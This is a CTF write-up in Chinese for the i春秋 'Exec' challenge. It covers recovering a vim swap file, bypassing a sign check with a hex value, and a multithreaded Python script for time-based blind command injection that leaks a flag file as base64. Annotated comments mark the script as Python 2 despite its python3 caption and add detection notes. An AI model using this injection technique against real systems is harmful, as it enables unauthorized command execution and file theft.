
i春秋 “百度杯”CTF比賽 十月場 Exec

https://www.ichunqiu.com/battalion?t=1&r=0

進入題目連結,是一隻貓咪

檢視網頁原始碼:

<!-- Challenge page source as quoted in this writeup (reproduced as shown,
     including </body> without <body> and no </html>). The non-standard
     meta attribute editor='vim' is the detail the text below reads as a
     hint toward a leftover editor swap file in the webroot. -->
<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
no sign

得到提示:vim
很容易聯想到vim編輯器的臨時交換檔案,嘗試/.index.php.swo,順利下載到檔案

vim -r index.php.swo

使用十六進位制形式繞過sign引數的檢查,他給的那個數字其實就是16進位制的0xabcdef

後面的步驟可以使用個人的vps去做,但是我沒有,參考網上的時間盲注也做不出來,無奈,只能現在放在這兒了

時間盲注程式碼如下:(使用了python3多執行緒)

import requests,string,threading


def getLength(url,payload):
    """Probe the length of the injected command's output via a timing oracle.

    For each candidate length ``i`` in 0..199 the posted ``cmd`` captures the
    output into ``a``, compares ``${#a}`` with ``i`` and sleeps 3 s on a match.
    The only signal read back is the client-side ``timeout=3``: the first POST
    that raises is taken as the match and its ``i`` is returned.

    Args:
        url: endpoint that receives the ``cmd`` form field.
        payload: shell command whose output length is being measured.

    Returns:
        The first ``i`` whose request raised, or 0 when none of the 200
        probes did (the caller cannot tell "length 0" from "no timeout").

    Defender note: up to 200 same-shaped POSTs, each carrying a literal
    ``sleep 3`` and differing only in the compared integer, is the visible
    signature of this probe in access logs.
    """
    data = {}
    length = 0
    # Python 2 builtin (also print statements below) -- this listing is
    # Python 2 despite the caption saying python3.
    for i in xrange(200):
        data['cmd']="a=$(%s);b=${#a};if test $b -eq %d;then sleep 3;fi"%(payload,i)
        try:
            r = requests.post(url,data=data,timeout=3)
        except:
            # Bare except: any exception (read timeout, connection error,
            # DNS failure) is read as "the sleep fired", not only a timeout.
            length = i
            print "the string length is {}".format(length)
            break
    return length

def getString(url,payload):
    """Worker thread: recover the output one character at a time by timing.

    Positions are handed out through the module-level ``curId`` counter under
    ``lock``.  A worker claims index ``i``, then for every character ``j`` in
    ``words`` posts a ``cmd`` that extracts character ``i+1`` of the captured
    output (``expr substr`` is 1-based) and sleeps 8 s when it equals ``j``.
    A request that raises (``timeout=8``) is taken as the match and ``j`` is
    stored in ``key[i]``; positions where nothing matched keep their initial
    placeholder.  Workers stop when ``curId`` reaches ``length``.

    Reads and writes the module globals ``length``, ``lock``, ``curId`` and
    ``key``; the script below must define them before threads start.

    Defender note: several concurrent connections each issuing long-lived,
    identically shaped POSTs containing ``sleep 8`` and a single varying
    character is the pattern to look for when hunting this technique.
    """
    global length,lock,curId,key
    data = {}
    # Python 2 names (string.uppercase/string.lowercase).  Presumably chosen
    # to cover base64 output (A-Z, a-z, 0-9, '/', '=', '+') -- see payload.
    words = string.uppercase+string.lowercase+string.digits+'/=+'
    i = 0
    while True:
        # Compare-and-increment under the lock so two workers never claim
        # the same position.
        lock.acquire()
        if curId == length:
            lock.release()
            break
        i = curId
        curId += 1
        lock.release()
        for j in words:
            data['cmd']="a=$({});b=`expr substr $a {} 1`;if test $b = '{}';then sleep 8;fi".format(payload,i+1,j)
            try:
                r = requests.post(url,data=data,timeout=8)
            except:
                # Bare except: any failure, not only a read timeout, counts
                # as a hit for this character.
                key[i] = j
                # The lock here only serialises the print; the key[i] write
                # above happens outside it.
                lock.acquire()
                print ''.join(key)
                lock.release()
                break


# Per-player challenge instance from the writeup; ``sign=0xabcdef`` is the hex
# form the text above says passes the sign check.
url = 'http://238de0378b514fc78acefac7676fefd36250b17a68494529.game.ichunqiu.com/index.php?sign=0xabcdef'
# Command whose output the workers reconstruct character by character.
payload = "base64 flag233.php -w 0" 
# Phase 1: output length.  getLength returns 0 when no probe timed out, in
# which case key is empty and every worker below exits immediately.
length = getLength(url,payload)
# Shared state read by getString: the lock guards curId (next unclaimed
# position) and key (one slot per character, '?' until matched).
lock = threading.Lock()
curId = 0 #max(curId) = length - 1
key = ['?' for i in xrange(length)]

# Phase 2: ten workers (Python 2 xrange) pull positions from curId until it
# reaches length; join() waits for all of them before the script ends.
th=[]
for i in xrange(10):
    t = threading.Thread(target=getString,args=(url,payload))
    th.append(t)
for t in th:
    t.start()  
for t in th:
    t.join()